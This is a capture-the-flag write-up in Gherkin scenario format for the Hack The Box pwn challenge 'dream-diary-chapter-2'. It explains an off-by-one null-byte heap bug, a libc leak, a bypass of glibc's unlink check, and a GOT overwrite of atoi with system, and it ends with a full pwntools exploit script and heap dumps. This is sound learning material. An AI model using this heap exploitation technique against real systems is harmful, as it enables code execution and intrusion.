## Version 2.0
## language: en

Feature: dream-diary-chapter-2
  Site:
    Hackthebox
  Category:
    Pwn
  User:
    lkkpp
  Goal:
    Get shell and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 16.04.4   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | Ghidra          | 9.1.2     |
    | GNU strings     | 2.26.1    |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see a hint with the following sentence
    """
    Xenial Xerus
    """
    Then this is the name of Ubuntu 16.04
    And it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    Then I downloaded the binary
    And I get information from the binary
    """
    $ strings chapter2
    /lib64/ld-linux-x86-64.so.2
    nP.7
    libc.so.6
    exit
    puts
    ...
    ...
    GLIBC_2.4
    GLIBC_2.2.5
    ...
    GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
    """
    Then I notice that the binary was compiled on Ubuntu 16.04.4
    And I mounted a VM of Ubuntu 16.04.4 to test it
    Then I analyze it with Ghidra disassembler [evidences](analysis.png)
    When I analyzed the edit function [evidences](edit.png)
    Then I noticed a bug in the sub function "func_zeroed" [evidences](bug.png)
    """
    void func_zeroed(long _size,long _buf)

    {
        *(undefined *)(_buf + _size) = 0;      <== BUG
        return;
    }
    """
    Then the bug is called null byte poisoning, aka off-by-one overflow
    And consists of the possibility of writing a '\0' after the buffer limit
    Then this attack is crucial in heap contexts because of the heap struct

  Scenario: Sucess:Leak libc
    Given I recognize the bug
    Then the first idea is leak libc
    And this is possible because of we can set the malloc size
    Then with the first fit behavior of glibc allocator
    Then I can defragment the heap in such a way that the structure favors me
    And leaking pointers from main arena [evidences](fleak.png)
    """
    pwndbg> x/60gx 0x1ed5000
      0x1ed5000:  0x0000000000000000  0x0000000000000021
      0x1ed5010:  0x0000000000000008  0x0000000001ed5030
      0x1ed5020:  0x0000000000000000  0x0000000000000021
      0x1ed5030:  0x4141414141414141  0x00007f7c6f01bbf8 <=== leak
      0x1ed5040:  0x4141414141414141  0x0000000000000071
      0x1ed5050:  0x00007f7c6f01bb78  0x00007f7c6f01bb78
      0x1ed5060:  0x4141414141414141  0x4141414141414141
      0x1ed5070:  0x4141414141414141  0x4141414141414141
      0x1ed5080:  0x4141414141414141  0x4141414141414141
      0x1ed5090:  0x4141414141414141  0x4141414141414141
      0x1ed50a0:  0x4141414141414141  0x4141414141414141
      0x1ed50b0:  0x0000000000000070  0x0000000000000020
      0x1ed50c0:  0x0000000000000108  0x0000000001ed50e0
      0x1ed50d0:  0x0000000000000000  0x0000000000000111
      0x1ed50e0:  0x4242424242424242  0x4242424242424242
    """

  Scenario: Fail:Exploiting the bug
    Given I identify a bug in the edit function
    Then to exploit this bug that seems insignificant
    Then it's necessary to have a very good understanding of how heap works
    And I am going to briefly explain some internal functions of the allocator
    When a chunk is allocated it has the following structure:
    """
    prev_size
    size [bits A|M|P]
    data
    """
    Then the bit P is PREV_INUSE
    And It sets to 0 when the previous chunk in memory is free
    Then the idea is use the null byte bug to trick the allocator
    And makes it believe that a chunk has been freed
    When it is actually still in use
    """
    pwndbg> x/70gx 0x0000000002194010 - 0x10
      0x2194000:  0x0000000000000000  0x0000000000000021
      0x2194010:  0x0000000000000008  0x0000000002194030
      0x2194020:  0x0000000000000000  0x0000000000000021
      0x2194030:  0x4141414141414141  0x00007f705df62bf8
      ...
      ...
      0x21940a0:  0x4141414141414141  0x4141414141414141
      0x21940b0:  0x0000000000000030  0x0000000000000021
      0x21940c0:  0x0000000000000108  0x00000000021940e0
      0x21940d0:  0x0000000000000000  0x0000000000000111 <-- still in use
      0x21940e0:  0x4242424242424242  0x4242424242424242
      0x21940f0:  0x4242424242424242  0x4242424242424242
      0x2194100:  0x4242424242424242  0x4242424242424242
      ...
      ...
      0x2194170:  0x4242424242424242  0x4242424242424242
      0x2194180:  0x4242424242424242  0x4242424242424242
      0x2194190:  0x4242424242424242  0x4242424242424242
      0x21941a0:  0x4242424242424242  0x4242424242424242
      0x21941b0:  0x4242424242424242  0x4242424242424242
      0x21941c0:  0x4242424242424242  0x4242424242424242
      0x21941d0:  0x4242424242424242  0x4242424242424242
      0x21941e0:  0x4242424242424242  0x0000000000000200 <-- prev freed
      0x21941f0:  0x00007f705df62b78  0x00007f705df62b78
    """
    Then with this approach I can do heap shrinking
    And this is due to the _int_malloc core function
    """
    ...
    ...
    /* split and reattach remainder */
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
    av->last_remainder = remainder;
    ...
    """
    And this means that if there are two free adjacent chunks
    Then glibc will consolidate the two chunks as one
    And the new allocation will be allocated by this chunk
    When it does not exceed its size
    Then with this it's possible create a fake chunk
    And overwrite the struct's pointer
    When I tried to do that I got the following error [evidences](prevsize.png)
    """
    corrupted size vs. prev_size
    """
    Then this error is because of the unlink macro
    """
    #define unlink(AV, P, BK, FD) {
      if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
        malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);
        ...
    """
    And this means that the size of the previously freed chunk
    Then must correspond to the previous size of the current chunk

  Scenario: Sucess:Exploiting the bug
    Given I need bypass the unlink checks
    Then my idea is set the prev_size of the chunk actual manually
    """
    allocate(0x208, b'D' * 0x1f0 + p64(0x200))
    """
    And 0x1f0 it would be the size of the previous chunk
    Then it's possible overwrite the struct's pointer [evidences](shrunk.png)
    And assign a pointer to the GOT to control the flow of execution
    Then I chose atoi for its calling convention [evidences](overwrite.png)
    And it is possible to use its first argument as a system parameter
    """
    atoi(char *buf) -> system(char *buf);
    """
    Then it's simple I edit that structure and trigger atoi [evidences](sh.png)
    And my exploit is this:
    """
    from pwn import *

    p = process('./chapter2')
    #p = remote('docker.hackthebox.eu', 32234)

    def allocate(size, data):
        p.recvuntil('>> ')
        p.sendline('1')
        p.recvuntil(': ')
        p.sendline(str(size))
        p.recvuntil(': ')
        p.sendline(data)

    def edit(index, data):
        p.recvuntil('>> ')
        p.sendline('2')
        p.recvuntil(': ')
        p.sendline(str(index))
        p.recvuntil(': ')
        p.sendline(data)

    def delete(index):
        p.recvuntil('>> ')
        p.sendline('3')
        p.recvuntil(': ')
        p.sendline(str(index))

    def dump(index):
        p.recvuntil('>> ')
        p.sendline('4')
        p.recvuntil(': ')
        p.sendline(str(index))

    pause()
    atoi_got = 0x602058

    allocate(0x88, 'A' * 0x88)
    allocate(0x108, 'B' * 0x108)
    delete(0)
    allocate(0x8, 'A' * 0x8)

    dump(0)
    p.recvuntil('Data: ')
    allocate(0x208, b'D' * 0x1f0 + p64(0x200))
    allocate(0x108, 'E'*0x108)
    allocate(0x108, 'F'*0x108)

    delete(2)
    edit(1, b'B' * 0x108)

    allocate(0x108,  b'G'*0x108)
    allocate(0x80,  b'H'*0x80)
    delete(2)
    delete(3)
    allocate(0x140, b'Z'*0x110 + p64(8) + p64(atoi_got))

    dump(5)
    p.recvuntil('Data: ')
    leak_atoi = u64(p.recv(6).ljust(8, b'\x00'))
    libc = leak_atoi - 0x0000000000036e70
    system = libc + 0x0000000000045380

    print ("atoi()", hex(leak_atoi))
    print ("Libc @", hex(libc))
    print ("system()", hex(system))

    edit(5, p64(system))

    p.interactive()
    """
